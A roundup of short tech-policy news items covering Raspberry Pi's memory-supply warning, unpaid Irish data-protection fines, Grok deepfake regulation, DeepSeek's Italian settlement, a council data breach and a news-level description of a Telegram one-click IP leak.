UK-based microcomputer manufacturer Raspberry Pi Holdings plc announced that surging demand for dynamic random access memory (DRAM) from AI data centres is tightening the supply of key components used in its products, leading to heightened uncertainty about future trading.
Investors reacted negatively, with shares sliding about 7.5 percent on the London Stock Exchange after the company’s warning that memory pricing and availability may remain constrained beyond the first half of 2026.
Raspberry Pi stressed that it has taken steps to mitigate the situation, including qualifying additional suppliers, developing lower-memory products and raising prices, and maintains sufficient inventory for the near term.
The company also reported that adjusted earnings for 2025 were ahead of market forecasts, supported by strong unit shipments. However, it highlighted ‘limited visibility’ for the second half of 2026 and beyond due to the unpredictable memory supply landscape.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
Ireland’s Data Protection Commission is owed more than €4 billion in fines imposed on companies, primarily Big Tech firms. Most of the penalties remain unpaid due to ongoing legal challenges.
Figures released under Freedom of Information laws show the watchdog collected only €125,000 from over €530 million in fines issued last year. Similar patterns have persisted across several previous years.
Since 2020, the commission has levied €4.04 billion in data protection penalties. Just €20 million has been paid, while the remaining balance is tied up in appeals before Irish and EU courts.
The regulator states that legislation prevents enforcement until the court proceedings conclude. Several cases hinge on a landmark WhatsApp ruling at the EU’s top court, expected to shape future collections.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
Körber Supply Chain and Sereact have formed a strategic partnership to bring AI-controlled pick-and-place robotics technology into automated production and distribution solutions.
The collaboration aims to overcome the limitations of conventional automation by using AI systems that analyse visual and object data in real-time and autonomously adjust picking strategies for a wide variety of products.
The Sereact solution is now part of Körber’s broader supply chain ecosystem, enabling companies to integrate flexible and scalable robot automation into their warehouse and logistics operations.
AI-enabled robots can handle unknown or complex items with precision and speed, making logistics processes more efficient and reducing reliance on manual labour.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
A Northern Ireland politician, Cara Hunter of the Social Democratic and Labour Party (SDLP), has quit X after renewed concerns over Grok AI misuse. She cited failures to protect women and children online.
The decision follows criticism of Grok AI features enabling non-consensual sexualised images. UK regulators have launched investigations under online safety laws.
UK ministers plan to criminalise creating intimate deepfakes and supplying related tools. Ofcom is examining whether X breached its legal duties.
Political leaders and rights groups say enforcement must go further. X says it removes illegal content and has restricted Grok image functions on the social media.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
Personal finance assistants powered by AI tools are increasingly helping users manage budgets, analyse spending, and organise financial documents. Popular platforms such as ChatGPT, Google Gemini, Microsoft Copilot, and Claude now offer features designed to support everyday financial tasks.
Rather than focusing on conversational style, users should consider how financial data is accessed and how each assistant integrates with existing systems. Connections to spreadsheets, cloud storage, and secure platforms often determine how effective AI tools are for managing financial workflows.
ChatGPT is commonly used for drafting financial summaries, analysing expenses, and creating custom tools through plugins. Google Gemini is closely integrated with Google Docs and Sheets, making it suitable for users who rely on Google’s productivity ecosystem.
Microsoft Copilot provides strong automation for Excel and Microsoft 365 users, with administrative controls that appeal to organisations. Claude focuses on safety and large context windows, allowing it to process lengthy financial documents with more conservative output.
Choosing the most suitable AI tools for personal finance depends on workflow needs, data governance preferences, and privacy considerations. No single platform dominates every use case; each offers strengths across different financial management tasks.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
The Irish government plans to fast-track laws allowing heavy fines for AI abuse. The move follows controversy involving misuse of image generation tools.
Ministers will transpose an existing EU AI Act into Irish law. The framework defines eight harmful uses breaching rights and public decency.
Penalties could reach €35 million or seven percent of global annual turnover. AI systems would be graded by risk under the enforcement regime.
A dedicated AI office is expected to launch by August to oversee compliance. Irish and UK leaders have pressed platforms to curb harmful AI features.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
A UK public sector cyberattack on Kensington and Chelsea Council has exposed the growing vulnerability of government organisations to data breaches. The council stated that personal details linked to hundreds of thousands of residents may have been compromised after attackers targeted the shared IT infrastructure.
Security experts warn that interconnected systems, while cost-efficient, create systemic risks. Dray Agha, senior manager of security operations at Huntress, said a single breach can quickly spread across partner organisations, disrupting essential services and exposing sensitive information.
Public sector bodies remain attractive targets due to ageing infrastructure and the volume of personal data they hold. Records such as names, addresses, national ID numbers, health information, and login credentials can be exploited for fraud, identity theft, and large-scale scams.
Gregg Hardie, public sector regional vice president at SailPoint, noted that attackers often employ simple, high-volume tactics rather than sophisticated techniques. Compromised credentials allow criminals to blend into regular activity and remain undetected for long periods before launching disruptive attacks.
Hardie said stronger identity security and continuous monitoring are essential to prevent minor intrusions from escalating. Investing in resilient, segmented systems could help reduce the impact of future UK public sector cyberattack incidents and protect critical operations.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!
The European Commission has warned X to address issues related to its Grok AI tool. Regulators say new features enabled the creation of sexualised images, including those of children.
EU Tech Sovereignty Commissioner Henna Virkkunen has stated that investigators have already taken action under the Digital Services Act. Failure to comply could result in enforcement measures being taken against the platform.
X recently restricted Grok’s image editing functions to paying users after criticism from regulators and campaigners. Irish and EU media watchdogs are now engaging with Brussels on the issue.
UK ministers also plan laws banning non-consensual intimate images and tools enabling their creation. Several digital rights groups argue that existing laws already permit criminal investigations and fines.
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
Chinese AI start-up DeepSeek will launch a customised Italian version of its online chatbot following a probe by the Italian competition authority, the AGCM. The move follows months of negotiations and a temporary 2025 ban due to concerns over user data and transparency.
The AGCM had criticised DeepSeek for not sufficiently warning users about hallucinations or false outputs generated by its AI models.
The probe ended after DeepSeek agreed to clearer Italian disclosures and technical fixes to reduce hallucinations. The regulator noted that while improvements are commendable, hallucinations remain a global AI challenge.
DeepSeek now provides longer Italian warnings and detects Italian IPs or prompts for localised notices. The company also plans workshops to ensure staff understand Italian consumer law and has submitted multiple proposals to the AGCM since September 2025.
The start-up must provide a progress report within 120 days. Failure to meet the regulator’s requirements could lead to the probe being reopened and fines of up to €10 million (£8.7m).
Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!
A newly identified vulnerability in Telegram’s mobile apps allows attackers to reveal users’ real IP addresses with a single click. The flaw, known as a ‘one-click IP leak’, can expose location and network details even when VPNs or proxies are enabled.
The issue comes from Telegram’s automatic proxy testing process. When a user clicks a disguised proxy link, the app initiates a direct connection request that bypasses all privacy protections and reveals the device’s real IP address.
Cybersecurity researcher @0x6rss demonstrated an attack on X, showing that a single click is enough to log a victim’s real IP address. The request behaves similarly to known Windows NTLM leaks, where background authentication attempts expose identifying information without explicit user consent.
ONE-CLICK TELEGRAM IP ADDRESS LEAK!
In this issue, the secret key is irrelevant. Just like NTLM hash leaks on Windows, Telegram automatically attempts to test the proxy. Here, the secret key does not matter and the IP address is exposed. Example of a link hidden behind a… https://t.co/KTABAiuGYIpic.twitter.com/NJLOD6aQiJ
Attackers can embed malicious proxy links in chats or channels, masking them as standard usernames. Once clicked, Telegram silently runs the proxy test, bypasses VPN or SOCKS5 protections, and sends the device’s real IP address to the attacker’s server, enabling tracking, surveillance, or doxxing.
Both Android and iOS versions are affected, putting millions of privacy-focused users at risk. Researchers recommend avoiding unknown links, turning off automatic proxy detection where possible, and using firewall tools to block outbound proxy tests. Telegram has not publicly confirmed a fix.
Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!